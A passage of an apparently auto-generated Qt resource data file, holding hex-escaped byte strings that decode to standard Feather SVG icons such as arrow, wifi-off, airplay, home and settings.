\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x6c\x65\x66\x74\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x39\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\
\x22\x35\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\
\x6e\x74\x73\x3d\x22\x31\x32\x20\x31\x39\x20\x35\x20\x31\x32\x20\
\x31\x32\x20\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x39\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x64\x6f\x77\x6e\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x35\x22\x20\x78\x32\x3d\x22\
\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x39\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\
\x6e\x74\x73\x3d\x22\x31\x39\x20\x31\x32\x20\x31\x32\x20\x31\x39\
\x20\x35\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x39\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x77\x69\x66\x69\x2d\
\x6f\x66\x66\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\x22\x32\x33\x22\
\x20\x79\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x36\x2e\x37\x32\x20\
\x31\x31\x2e\x30\x36\x41\x31\x30\x2e\x39\x34\x20\x31\x30\x2e\x39\
\x34\x20\x30\x20\x30\x20\x31\x20\x31\x39\x20\x31\x32\x2e\x35\x35\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\
\x3d\x22\x4d\x35\x20\x31\x32\x2e\x35\x35\x61\x31\x30\x2e\x39\x34\
\x20\x31\x30\x2e\x39\x34\x20\x30\x20\x30\x20\x31\x20\x35\x2e\x31\
\x37\x2d\x32\x2e\x33\x39\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x30\x2e\x37\x31\x20\x35\
\x2e\x30\x35\x41\x31\x36\x20\x31\x36\x20\x30\x20\x30\x20\x31\x20\
\x32\x32\x2e\x35\x38\x20\x39\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x2e\x34\x32\x20\x39\
\x61\x31\x35\x2e\x39\x31\x20\x31\x35\x2e\x39\x31\x20\x30\x20\x30\
\x20\x31\x20\x34\x2e\x37\x2d\x32\x2e\x38\x38\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x38\x2e\
\x35\x33\x20\x31\x36\x2e\x31\x31\x61\x36\x20\x36\x20\x30\x20\x30\
\x20\x31\x20\x36\x2e\x39\x35\x20\x30\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\
\x79\x31\x3d\x22\x32\x30\x22\x20\x78\x32\x3d\x22\x31\x32\x2e\x30\
\x31\x22\x20\x79\x32\x3d\x22\x32\x30\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x6a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x69\x72\x70\x6c\
\x61\x79\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x35\x20\
\x31\x37\x48\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\
\x2d\x32\x56\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\
\x2d\x32\x68\x31\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\
\x32\x20\x32\x76\x31\x30\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x2d\x32\x20\x32\x68\x2d\x31\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\
\x22\x31\x32\x20\x31\x35\x20\x31\x37\x20\x32\x31\x20\x37\x20\x32\
\x31\x20\x31\x32\x20\x31\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\
\x6f\x6e\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x75\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x6c\x75\x73\x2d\
\x73\x71\x75\x61\x72\x65\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\
\x22\x33\x22\x20\x79\x3d\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\
\x22\x31\x38\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x38\x22\
\x20\x72\x78\x3d\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\
\x2f\x72\x65\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x31\x32\x22\x20\x79\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x31\
\x32\x22\x20\x79\x32\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x38\x22\x20\x79\
\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x31\x36\x22\x20\x79\
\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\xa5\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6c\x6f\x75\x64\
\x2d\x72\x61\x69\x6e\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x36\x22\x20\x79\x31\x3d\x22\x31\x33\x22\x20\x78\x32\x3d\
\x22\x31\x36\x22\x20\x79\x32\x3d\x22\x32\x31\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x38\x22\
\x20\x79\x31\x3d\x22\x31\x33\x22\x20\x78\x32\x3d\x22\x38\x22\x20\
\x79\x32\x3d\x22\x32\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\
\x22\x31\x35\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\
\x22\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\
\x68\x20\x64\x3d\x22\x4d\x32\x30\x20\x31\x36\x2e\x35\x38\x41\x35\
\x20\x35\x20\x30\x20\x30\x20\x30\x20\x31\x38\x20\x37\x68\x2d\x31\
\x2e\x32\x36\x41\x38\x20\x38\x20\x30\x20\x31\x20\x30\x20\x34\x20\
\x31\x35\x2e\x32\x35\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x0e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x76\x72\
\x6f\x6e\x2d\x6c\x65\x66\x74\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x35\x20\x31\x38\
\x20\x39\x20\x31\x32\x20\x31\x35\x20\x36\x22\x3e\x3c\x2f\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x6c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x61\x79\x6f\x75\
\x74\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\x20\x79\
\x3d\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\x22\x20\
\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x38\x22\x20\x72\x78\x3d\x22\
\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x33\x22\x20\x79\x31\
\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x32\x31\x22\x20\x79\x32\x3d\
\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x39\x22\x20\x79\x31\x3d\x22\x32\x31\x22\x20\
\x78\x32\x3d\x22\x39\x22\x20\x79\x32\x3d\x22\x39\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x4c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x68\x6f\x6d\x65\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x33\x20\x39\x6c\x39\
\x2d\x37\x20\x39\x20\x37\x76\x31\x31\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x31\x2d\x32\x20\x32\x48\x35\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x31\x2d\x32\x2d\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\
\x73\x3d\x22\x39\x20\x32\x32\x20\x39\x20\x31\x32\x20\x31\x35\x20\
\x31\x32\x20\x31\x35\x20\x32\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x03\xf3\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x65\x74\x74\x69\
\x6e\x67\x73\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\
\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\
\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x61\x74\
\x68\x20\x64\x3d\x22\x4d\x31\x39\x2e\x34\x20\x31\x35\x61\x31\x2e\
\x36\x35\x20\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\x20\x2e\x33\
\x33\x20\x31\x2e\x38\x32\x6c\x2e\x30\x36\x2e\x30\x36\x61\x32\x20\
\x32\x20\x30\x20\x30\x20\x31\x20\x30\x20\x32\x2e\x38\x33\x20\x32\
\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2e\x38\x33\x20\x30\x6c\
\x2d\x2e\x30\x36\x2d\x2e\x30\x36\x61\x31\x2e\x36\x35\x20\x31\x2e\
\x36\x35\x20\x30\x20\x30\x20\x30\x2d\x31\x2e\x38\x32\x2d\x2e\x33\
\x33\x20\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\x20\x30\x20\x30\x20\
\x30\x2d\x31\x20\x31\x2e\x35\x31\x56\x32\x31\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x31\x2d\x32\x20\x32\x20\x32\x20\x32\x20\x30\x20\
\x30\x20\x31\x2d\x32\x2d\x32\x76\x2d\x2e\x30\x39\x41\x31\x2e\x36\
\x35\x20\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\x20\x39\x20\x31\
\x39\x2e\x34\x61\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\x20\x30\x20\
\x30\x20\x30\x2d\x31\x2e\x38\x32\x2e\x33\x33\x6c\x2d\x2e\x30\x36\
\x2e\x30\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2e\
\x38\x33\x20\x30\x20\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x30\
\x2d\x32\x2e\x38\x33\x6c\x2e\x30\x36\x2d\x2e\x30\x36\x61\x31\x2e\
\x36\x35\x20\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\x20\x2e\x33\
\x33\x2d\x31\x2e\x38\x32\x20\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\
\x20\x30\x20\x30\x20\x30\x2d\x31\x2e\x35\x31\x2d\x31\x48\x33\x61\
\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\x20\x32\x20\
\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\x32\x68\x2e\x30\x39\x41\
\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\x20\
\x34\x2e\x36\x20\x39\x61\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\x20\
\x30\x20\x30\x20\x30\x2d\x2e\x33\x33\x2d\x31\x2e\x38\x32\x6c\x2d\
\x2e\x30\x36\x2d\x2e\x30\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x20\x30\x2d\x32\x2e\x38\x33\x20\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x20\x32\x2e\x38\x33\x20\x30\x6c\x2e\x30\x36\x2e\x30\x36\
\x61\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\
\x20\x31\x2e\x38\x32\x2e\x33\x33\x48\x39\x61\x31\x2e\x36\x35\x20\
\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\x20\x31\x2d\x31\x2e\x35\
\x31\x56\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\
\x32\x20\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x32\x76\
\x2e\x30\x39\x61\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\x20\x30\x20\
\x30\x20\x30\x20\x31\x20\x31\x2e\x35\x31\x20\x31\x2e\x36\x35\x20\
\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\x20\x31\x2e\x38\x32\x2d\
\x2e\x33\x33\x6c\x2e\x30\x36\x2d\x2e\x30\x36\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x31\x20\x32\x2e\x38\x33\x20\x30\x20\x32\x20\x32\
\x20\x30\x20\x30\x20\x31\x20\x30\x20\x32\x2e\x38\x33\x6c\x2d\x2e\
\x30\x36\x2e\x30\x36\x61\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\x20\
\x30\x20\x30\x20\x30\x2d\x2e\x33\x33\x20\x31\x2e\x38\x32\x56\x39\
\x61\x31\x2e\x36\x35\x20\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\
\x20\x31\x2e\x35\x31\x20\x31\x48\x32\x31\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x31\x20\x32\x20\x32\x20\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x2d\x32\x20\x32\x68\x2d\x2e\x30\x39\x61\x31\x2e\x36\x35\
\x20\x31\x2e\x36\x35\x20\x30\x20\x30\x20\x30\x2d\x31\x2e\x35\x31\
\x20\x31\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\xa3\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x69\x76\x69\x64\
\x65\x2d\x73\x71\x75\x61\x72\x65\x22\x3e\x3c\x72\x65\x63\x74\x20\
